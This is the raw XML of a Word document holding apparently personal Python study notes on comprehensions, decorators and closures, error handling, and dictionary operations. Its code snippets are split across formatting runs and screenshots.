        </w:rPr>
        <w:t>wrapper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DB399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733DF86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89875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@performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B706DE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long_time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1334030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D6485B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72A1BA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47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>range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1000000000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246AD8C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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320C456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BD06AB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989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>long_time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259A116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9B1F26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0F09473" wp14:editId="087BF8DD">
            <wp:extent cx="3035300" cy="546100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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B02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FA0763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9E543E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B6BAA4B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 xml:space="preserve">Set {} </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00233C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dict</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00233C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> {'a': 'a', 'b': 'b'} comprehensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C70FF3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45FC10D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3:01 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721EC791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706FE25" wp14:editId="02508C57">
            <wp:extent cx="5765800" cy="5969000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8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B001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9A0045E" w14:textId="77777777" w:rsidR="00233C26" w:rsidRDefault="00095BB5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  <w:r w:rsidR="00233C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>set-dict-comprehension.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD46DF4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28B016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list [] , set {} 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dict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{ 'a': 'a', 'b': 'b' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C0DAF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set {} does NOT allow duplicated elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669D828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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">char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 xml:space="preserve">char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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'hello'</w:t>
      </w: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43A4B65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my_list2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72A1BA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72A1BA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47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>range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100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F38D1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list [] allows duplicated elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A782CE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my_list3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** </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2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72A1BA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47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>range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100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F60792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my_list4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** </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2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72A1BA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47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>range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100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315C7E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% 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15A3D6B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'my_list4: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my_list4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97121D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42C1C8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simple_dict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14:paraId="7B4E742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B8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'a'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0BCBD11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B8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'b'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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25214B0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0948260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NOT affecting original dictionary {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE8D11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{ } = {key: value ** 2 for key, value in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iterable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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AAF9D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my_dict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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>key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** </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2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>key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value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simple_dict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items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673F585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% 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} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"># only Even values being added to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my_dict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{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042CD40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'simple_dict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simple_dict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6CEE2E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'my_dict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my_dict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9E3103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6F190C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C4B0B3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list1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>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FAF5C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my_dict2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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2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72A1BA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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>list1</w:t>
      </w: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47B4C71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'my_dict2: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my_dict2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D467C5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141E1923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724903D" wp14:editId="00BE5B91">
            <wp:extent cx="1422400" cy="1422400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="84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7184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82B16F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81DAE6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5B915C9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Exercise comprehension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0885B4D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0C77300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3:13 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537AAF3F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1CB8745" wp14:editId="18112162">
            <wp:extent cx="4483100" cy="3886200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="85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1E5E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7E9471" w14:textId="77777777" w:rsidR="005D4128" w:rsidRDefault="005D4128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71FD4C25" w14:textId="0FD75903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ex-comprehension.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5F0BFF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25C065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some_list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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'a'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'b'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'b'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'm'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'n'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6BDCC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duplicates</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68014F0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 xml:space="preserve">value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some_list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1540A05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some_list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count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) &gt; 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6B53442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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">value </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">not in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>duplicates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746A684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duplicates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append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12E689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14:paraId="5C6F671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'duplicates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duplicates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8D3797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3E85B7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set(['b', 'b', 'n', 'n']) =&gt; {'b', 'n'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240ADBA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list({'b', 'n'}) =&gt; ['n', 'b']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F983D5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list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set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>([</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">element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 xml:space="preserve">element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some_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E76705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some_list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count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) &gt; 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]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BFF6B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'my_list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F67DCA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my_list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E88281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877C4A3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43A7E3C" wp14:editId="3309ACE3">
            <wp:extent cx="1968500" cy="1244600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="86" name="Pictur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94D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1BD6D5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B18AB2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EDDF26C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1C69C285" w14:textId="74D11CAF" w:rsidR="00233C26" w:rsidRPr="005D4128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b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D4128">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Decorators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20581E4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14:paraId="6F8DE82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5:44 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320FE4A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6C3B54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D0D6F9B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Decorator-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477F63D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14:paraId="7D26742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5:44 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4743648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@classmethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F74267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@staticmethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F5AA5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C95453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# greet = hello =&gt; store hello function to memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658C445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# even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hello(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) has been deleted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51277C4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#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closures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still caches def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hello(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) to memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D7771F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53A3D9C" wp14:editId="765A4589">
            <wp:extent cx="2921000" cy="1549400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="87" name="Pictur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1DD7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59A0C27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02A9DFF" wp14:editId="7DFBF176">
            <wp:extent cx="4318000" cy="787400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="88" name="Pictur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0F98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0277B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B71A4B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56B340E" wp14:editId="3CB8CC6F">
            <wp:extent cx="3759200" cy="3302000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="89" name="Pictur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88A4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5DE098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887A5E1" wp14:editId="26F35D44">
            <wp:extent cx="4343400" cy="787400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="90" name="Pictur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E0B6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67E0A5A" w14:textId="77777777" w:rsidR="005D4128" w:rsidRDefault="005D4128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22881C47" w14:textId="5246F050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# closures working ;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB18990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14DB9D7" wp14:editId="7DDF5986">
            <wp:extent cx="3098800" cy="3378200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="91" name="Pictur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734D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B44DDE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C7A6382" wp14:editId="7E487FC3">
            <wp:extent cx="4368800" cy="1536700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="92" name="Pictur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C04F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6F7E80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8D1C07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3E5A60B0" wp14:editId="2C3C1BBA">
            <wp:extent cx="3797300" cy="3302000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="93" name="Pictur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8F6F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2A6FA9B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900759B" wp14:editId="41AC7647">
            <wp:extent cx="4343400" cy="723900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="94" name="Pictur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F1D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5927D4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FDDD5A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C5A49F9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higher-order-function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED4BB4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14:paraId="2221B3A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6:00 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F659ED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04259C3" wp14:editId="5C7A4AC1">
            <wp:extent cx="4940300" cy="2806700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="95" name="Pictur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926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5D1EAF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130CDC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852BA96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Decorator-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CCD2E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14:paraId="24C49E0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6:00 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F004E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14:paraId="03F9FEBF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92C1CD" wp14:editId="4B21C0B2">
            <wp:extent cx="4521200" cy="6019800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="96" name="Pictur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EA88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F83ECED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68EA43BB" wp14:editId="7E353951">
            <wp:extent cx="4368800" cy="2603500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="97" name="Pictur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52E8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4775A4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1CFDA3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3E08A36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5DF4650C" w14:textId="2C5FD7A4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Decorator-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D5661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14:paraId="2CBB177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6:01 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207FFB29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E4D734" wp14:editId="1820CC9F">
            <wp:extent cx="3746500" cy="4597400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="98" name="Pictur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1FF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67D6EC5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D56A45D" wp14:editId="3FEC4AE4">
            <wp:extent cx="4368800" cy="1016000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="99" name="Pictur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259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1225AF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E087D4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6BB4544" w14:textId="08233F71" w:rsidR="00233C26" w:rsidRPr="005D4128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b/>
          <w:bCs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 w:rsidRPr="005D4128">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195D2EB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26D4E42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3:33 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5041EB02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701F520" wp14:editId="5125C6D5">
            <wp:extent cx="4279900" cy="2997200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="100" name="Pictur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9E1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979D30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demo-2.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A2BAF9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EB91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Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A42CAB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from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colorama</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Fore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F689A1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while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AED222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6430C6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'What is your age? '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4540938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WHITE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'age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9688B6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except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ValueError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0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1AB8640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'ValueError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...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EE14AB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13FB10F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'Thanks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1C7859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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5CB6D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5E0214A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149BD09" wp14:editId="74E5CC12">
            <wp:extent cx="5334000" cy="1346200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="101" name="Pictur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9E80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3F72DB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CA1586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4CA98E2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demo-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B57C1A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20AC522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4:14 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD83DAC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ED2CB85" wp14:editId="67D68641">
            <wp:extent cx="4660900" cy="5676900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="102" name="Pictur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2960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013F6A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BE95CC2" wp14:editId="32983C98">
            <wp:extent cx="1282700" cy="584200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="103" name="Pictur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8EF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7A675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8DAC8B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C5243EE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demo-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B04F78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789999E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4:15 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B1861D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5595CF3" wp14:editId="204FA5EE">
            <wp:extent cx="4940300" cy="5080000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="104" name="Pictur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C88C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2A9D5229" wp14:editId="7065B94C">
            <wp:extent cx="5080000" cy="4940300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="105" name="Pictur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7DA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BD60F04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982809D" wp14:editId="6E8CBF01">
            <wp:extent cx="3213100" cy="2171700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="106" name="Pictur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AFCF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69895B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6B511A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B724080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demo-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192167B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22, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31956D1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4:15 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C86E45F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8887D81" wp14:editId="1743862C">
            <wp:extent cx="4940300" cy="4254500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="107" name="Pictur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E24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3BDE56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47F0454" wp14:editId="67D5C2C9">
            <wp:extent cx="1866900" cy="2806700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="108" name="Pictur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535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703497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425FC5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04DC86D" w14:textId="7B7AEBE8" w:rsidR="00233C26" w:rsidRPr="005D4128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b/>
          <w:bCs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 w:rsidRPr="005D4128">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Data Structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230EFA5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10A7391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4:31 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4624D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000EF4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EE84B16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Dictionary </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a.k.a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00233C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6095722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6049BA1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4:32 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07757986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C3C9B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hashMap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14:paraId="321F637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B8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"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first_name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"naga"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793816E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B8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"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last_name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sai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nikhil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77D3CF7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B8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"age"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899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>21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13CA2A5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899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC75B6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7409FAF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Iterate through each key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEDEEA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to get each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key.value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6BE998E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72A1BA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">in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hashMap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keys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7B9B585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'Iterating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hashMap.key.values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197EE1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hashMap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[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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C950FD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D8E7DA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E767C5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528D73F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'========================'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A7B55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x =&gt;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hashMap.key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17E36FF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y =&gt;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hashMap.key.value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B4B2F8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Remove an Object key "age" in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hashMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E6AE48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hashMap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pop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"age"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5CDAF0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Clear all keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC0DB9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#hashMap.clear()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B5ECB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y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">in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hashMap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items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29477B8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'hashMap.key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+" "+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hashMap.key.value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65BC43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Integer cannot append to string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79832C5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NOT using Type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coersion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38493F4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Use type conversion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0D64A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str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>)+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>" "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>str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y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DC318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B655C2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A8D99B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#print("key is {placeholder1}, value is {placeholder2}".format(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x,y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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054ECEE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#print("key is {}, value is {}".format(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x,y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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B637FE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'hashMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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key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is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x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, value is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y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32FA06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29928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'========================'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6E7B36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21D9D57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print('')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDE799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print(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f'Lenght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of {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hashMap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}: ',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len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hashMap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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEC57E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Get keys of a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hashMap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Object only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF4E08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print('')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035784C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print(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f'hashMap.keys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(): ',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hashMap.keys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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8E5E7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Gey key values only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CA418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print('')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214103D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print(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f'hashMap.values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(): ',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hashMap.values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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563DAF4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Get key items (Tuple) only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177A95B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lastRenderedPageBreak/>
        <w:t># print('')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CE02D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print(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f'hashMap.items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() in Tuple: ',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hashMap.items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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4FD3E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Get 1st key value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578086E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print('')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C3304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print(f'1st key value -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hashMap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["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first_name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"]: ',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hashMap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["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first_name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"])</w:t>
      </w:r>
    </w:p>
